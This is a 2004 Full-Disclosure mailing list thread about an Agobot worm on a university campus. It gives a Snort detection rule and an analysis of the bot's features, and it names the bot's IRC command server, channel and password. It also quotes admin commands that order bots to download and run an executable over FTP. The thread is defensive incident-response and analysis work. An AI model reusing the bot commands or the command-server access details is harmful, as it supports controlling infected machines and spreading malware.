We have currently blocked connections to port to/from 7000 on the following hosts:
130.74.82.206 131.234.100.43 193.87.20.31 This seems to have contained the spread of the worm within our campus. The list of hosts was gathered with a snort signature of: alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet";classtype:bad-unknown; sid:71727; rev:1;) Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm. -Dave Hale Sr. Security Specialist Michigan Technological University > > ----- Original Message ----- > From: "Morning Wood" > Date: Sat, 24 Apr 2004 18:37:31 +0000 > To: [EMAIL PROTECTED], [EMAIL PROTECTED] > Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus > >> phatbot? > > This one is yet another agobot. Has long list of useful commands > (included in the end of posting, if someone is interested...), > polymorph capability, stealth capability -hides its own process > in memory and binary from listing, capable of updating itself > via ftp/http, has list of servers for evaluating connection speed, > steals cdkeys, sniffs a wire, performs ddos, capable installing > a proxy, sends spam via aol, can install identd, has LONG list > various processes to kill (mostly AV, but also regedit and tcpview > among others), retrievs sysinfo, makes screenshots etc etc etc - > looks similar to others good household bot's :) > > What makes its interesting - its stealth capability and propagation. > It has following scanning/propagation subroutines: > > CScannerBagle > CScannerBase > CScannerDCOM > CScannerDoom > CScannerDW > CScannerHTTP > CScannerNetBios > CScannerOptix > CScannerSQL > CScannerUPNP > CScannerWKS > > > When worm is started, it connects to irc server > 193.87.20.31 (irc.weednet.net) port 7000. > Then it joines to password ptotected channel > #1337, password is heyho. As channel topic is > .scan.startall, it accepts command and starts > right away scanning. > > I took my trusty irc client and joined to that > channel by myself. Right away admin gave me those > commands: > > <admin> .login stebo jamesbond007 -s > <admin> .ftp.update ftp://ftp:[EMAIL PROTECTED]/incoming/dt.exe > %TEMP%\xgf.exeBLAOR12 > <admin> .scan.stop > <admin> .ftp.update ftp://ftp:[EMAIL PROTECTED]/incoming/dt.exe > c:\xgf.exe BLAOR12 > > seems like my 'bot' version was too old :) > > have fun :) > > W. > > > ----------------------- > commands and parameters > all commands starts with . (dot) > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
